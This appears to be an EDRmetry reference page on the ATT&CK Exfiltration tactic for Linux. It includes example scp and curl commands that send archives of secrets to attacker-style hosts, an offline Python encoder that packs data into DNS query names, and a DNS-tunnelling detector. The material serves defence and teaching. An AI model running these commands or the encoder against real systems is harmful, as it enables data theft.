Exfiltration - TA0010

Objective:

  • Steal collected data from the target environment. Exfiltration consists of techniques that adversaries may use to steal data from your network. Once they’ve collected data, adversaries often package it to avoid detection while removing it. This can include compression and encryption. Techniques for getting data out of a target network typically include transferring it over their command and control channel or an alternate channel and may also include putting size limits on the transmission.

  • ID: TA0010

    • https://attack.mitre.org/tactics/TA0010/


Linux Context:

Exfiltration on Linux leverages SSH (scp, sftp), FTP, or cloud uploads (e.g., aws s3 cp). Data is usually staged and compressed (tar, gzip) or encrypted (openssl enc) before it leaves, both to shrink it and to defeat content inspection. Covert channels such as ICMP tunneling or DNS exfiltration pass through firewalls that allow those protocols outbound, and attackers throttle or chunk transfers to stay below bandwidth alert thresholds. In cloud environments, misconfigured S3 buckets or exposed SFTP servers serve as drop points.


Key Techniques:

  • Exfiltration Over C2 Channel (T1041): Sending data out over the existing C2 connection so it blends with beaconing traffic.

  • Exfiltration Over Alternative Protocol (T1048): Using a protocol other than the C2 channel, such as SCP/SFTP, FTP, DNS or ICMP.

  • Data Transfer Size Limits (T1030): Chunking or throttling data so that no single transfer crosses a volume threshold that would trigger an alert.


Flow Example:

  • Running scp -i key data.tar.gz attacker@remote:/tmp (T1048 over SSH) or curl -F "file=@secrets.zip" http://drop.site (multipart HTTP POST to an attacker-controlled drop site). In both cases the data has already been collected, archived and compressed before the transfer command runs.
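The flow above moves one archive in a single transfer. The Linux Context and Key Techniques sections also describe the quieter variant: compress, cut the payload into size-limited pieces (T1030), and carry each piece in a DNS query name (the DNS form of T1048, which the EDR-T6307 and EDR-T6115 tests exercise). The following is an added example, not EDRmetry's code or any real tool; it builds and decodes the query names offline so the packaging logic can be inspected, and sends nothing. The zone name and the 90-byte chunk size are assumptions.

```python
"""
Added example (not EDRmetry's code): package data the way T1030 and the DNS
variant of T1048 describe - gzip it, split it into size-limited chunks, encode
each chunk as DNS labels - and reassemble it on the receiving side. Nothing is
transmitted; names are built in memory. Domain and chunk size are assumptions.
"""
import base64
import gzip
from typing import Dict, List

EXFIL_DOMAIN = "exfil.example.com"   # hypothetical attacker-controlled zone
MAX_LABEL = 63                       # RFC 1035 label limit
MAX_NAME = 253                       # RFC 1035 name limit (presentation form)


def package(data: bytes, chunk_size: int = 90) -> List[str]:
    """Compress data, cut it into chunk_size-byte pieces (T1030), and encode
    each piece as one query name: <seq>-<total>.<base32 labels>.<domain>."""
    payload = gzip.compress(data, mtime=0)
    chunks = [payload[i:i + chunk_size] for i in range(0, len(payload), chunk_size)]
    names = []
    for seq, chunk in enumerate(chunks):
        # base32 is case-insensitive and DNS-safe; '=' padding is dropped here
        # and restored by unpack() from the encoded length.
        b32 = base64.b32encode(chunk).decode("ascii").rstrip("=").lower()
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([f"{seq:04d}-{len(chunks):04d}", *labels, EXFIL_DOMAIN])
        if len(name) > MAX_NAME:
            raise ValueError("chunk_size too large for a single query name")
        names.append(name)
    return names


def unpack(names: List[str]) -> bytes:
    """Receiver side: accept queries in any order (resolver retries and
    reordering are normal), drop unrelated names, restore padding, check
    that every chunk arrived, then gunzip the reassembled payload."""
    suffix = "." + EXFIL_DOMAIN
    chunks: Dict[int, bytes] = {}
    total = None
    for name in names:
        if not name.endswith(suffix):
            continue                              # unrelated query, ignore
        labels = name[: -len(suffix)].split(".")
        seq, total = (int(x) for x in labels[0].split("-"))
        b32 = "".join(labels[1:]).upper()
        b32 += "=" * (-len(b32) % 8)              # restore stripped padding
        chunks[seq] = base64.b32decode(b32)       # duplicates simply overwrite
    if total is None or len(chunks) != total:
        raise ValueError("incomplete transfer: %d of %s chunks" % (len(chunks), total))
    return gzip.decompress(b"".join(chunks[i] for i in range(total)))


if __name__ == "__main__":
    # Constructed sample input standing in for a collected credential file.
    sample = b"".join(f"svc{i}:$6$salt{i:04d}$hash\n".encode() for i in range(50))
    queries = package(sample)
    print(f"{len(sample)} bytes -> {len(queries)} DNS queries, e.g. {queries[0]}")
    assert unpack(queries[::-1]) == sample
```

Each query name stays within the 63-byte label and 253-byte name limits, which is why the per-chunk budget is small and why real transfers of this kind generate many hundreds of queries; that volume is exactly what the detection example under Defender Strategies keys on.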


Defender Strategies:

  • Monitor egress with NIDS and full packet capture (FPC), enforce DLP policies, and restrict cloud API access (scoped IAM policies, egress-restricted endpoints). Audit SSH activity for large or unusual transfers: sshd itself does not log bytes moved, so correlate session logs with flow or byte counters, or run internal-sftp with -l INFO so that each file close records bytes read and written. Baseline DNS and ICMP volume and query-name length per host as well, since tunnels over those protocols never touch the file-transfer channels the controls above watch.
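One concrete form of the egress monitoring described above, for the DNS case, is a scorer over resolver query logs: a single client sending many distinct, long, high-entropy subdomains under one parent domain in a short window looks like encoded data rather than hostnames. This is an added example, not EDRmetry's code or a detection shipped with any product. The log lines are constructed here in a BIND9-like query-log layout, the thresholds are assumptions to tune against your own baseline, and the parent domain is approximated as the last two labels (real tooling should consult the Public Suffix List).

```python
"""
Added example (not EDRmetry's code): flag DNS-tunnelled exfiltration in
resolver query logs. Heuristic: many unique, long, high-entropy subdomains
from one client under one parent domain. Log lines are constructed in a
BIND9-like layout; thresholds and the two-label domain split are assumptions.
"""
import hashlib
import math
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# BIND9 query log shape:
# "<ts> client @0x.. 10.0.0.5#41234 (name): query: name IN TXT + (10.0.0.1)"
QUERY_RE = re.compile(r"client (?:@\S+ )?(\d+\.\d+\.\d+\.\d+)#\d+ .*?query: (\S+) IN (\S+)")


def parent_domain(qname: str) -> str:
    """Approximate the registrable domain as the last two labels (assumption)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def entropy(s: str) -> float:
    """Shannon entropy of a string in bits per character."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def detect_dns_exfil(lines: List[str], min_unique: int = 20, min_avg_len: int = 60,
                     min_entropy: float = 3.5) -> List[Tuple[str, str, Dict]]:
    """Return (client, domain, stats) for client/domain pairs whose subdomain
    traffic looks like encoded data: enough distinct names, long, high entropy."""
    subs: Dict[Tuple[str, str], set] = defaultdict(set)
    qtypes: Dict[Tuple[str, str], Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = QUERY_RE.search(line)
        if not m:
            continue
        client, qname, qtype = m.groups()
        qname = qname.rstrip(".").lower()
        dom = parent_domain(qname)
        sub = qname[: -len(dom)].rstrip(".")
        if sub:                                   # skip bare apex lookups
            subs[(client, dom)].add(sub)
            qtypes[(client, dom)][qtype] += 1
    alerts = []
    for key, names in subs.items():
        if len(names) < min_unique:
            continue
        avg_len = sum(len(s) for s in names) / len(names)
        avg_ent = sum(entropy(s.replace(".", "")) for s in names) / len(names)
        if avg_len >= min_avg_len and avg_ent >= min_entropy:
            alerts.append((key[0], key[1], {"unique": len(names), "avg_len": round(avg_len, 1),
                                            "avg_entropy": round(avg_ent, 2),
                                            "qtypes": dict(qtypes[key])}))
    return alerts


def build_sample_log() -> List[str]:
    """Constructed sample: one client browsing normally, one tunnelling over TXT."""
    lines = []
    benign = ["www.example.org", "mail.example.org", "cdn.example.org", "updates.example.org"]
    for i, name in enumerate(benign * 8):
        lines.append(f"10-Jun-2024 09:00:{i:02d}.000 client @0x7f1 10.0.0.5#41000 ({name}): "
                     f"query: {name} IN A + (10.0.0.1)")
    for seq in range(30):
        blob = hashlib.sha256(f"chunk{seq}".encode()).hexdigest() * 2   # stands in for encoded data
        labels = ".".join(blob[i:i + 63] for i in range(0, len(blob), 63))
        name = f"{seq:04d}.{labels}.exfil.example.com"
        lines.append(f"10-Jun-2024 09:01:{seq:02d}.000 client @0x7f2 10.0.0.9#53211 ({name}): "
                     f"query: {name} IN TXT + (10.0.0.1)")
    return lines


if __name__ == "__main__":
    for client, dom, stats in detect_dns_exfil(build_sample_log()):
        print(f"ALERT {client} -> {dom}: {stats}")
```

Tune the three thresholds against a week of your own logs before alerting on them: CDNs, anti-virus cloud lookups and some SaaS products legitimately generate long hashed subdomains, so the unique-count and entropy gates together, not either alone, are what keep the false-positive rate usable.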


The current list of corresponding EDRmetry test definitions includes:

  • EDR-T6307 - DNS Exfiltration with dig

  • EDR-T6115 - DNS Tunneling/Exfiltration with dnscat2

  • EDR-T6169 - eBPF Magic String Tracepoint Execution with bpftrace

  • EDR-T6136 - Exfil data using rsync

  • EDR-T6137 - Exfil data using transfer.sh

  • EDR-T6342 - Exfil data with AWS S3

  • EDR-T6211 - ICMP Python Scapy Exfiltration

  • EDR-T6168 - ICMP_exfil + nping Exfiltration

  • EDR-T6112 - NTP Data Exfiltration

  • EDR-T6103 - PAM creds over HTTP Post

  • EDR-T6234 - pam_exec SSHD Exfiltration

  • EDR-T6120 - Python FTP Upload

  • EDR-T6180 - SMB Data Exfiltration with impacket

  • EDR-T6257 - Telegram Data Exfiltration

  • EDR-T6052 - Upload data over HTTP/HTTPS

  • EDR-T6021 - Upload data over SCP/SFTP

  • EDR-T6135 - Upload data over WebDAV

  • EDR-T6181 - Upload/download data over SSHFS
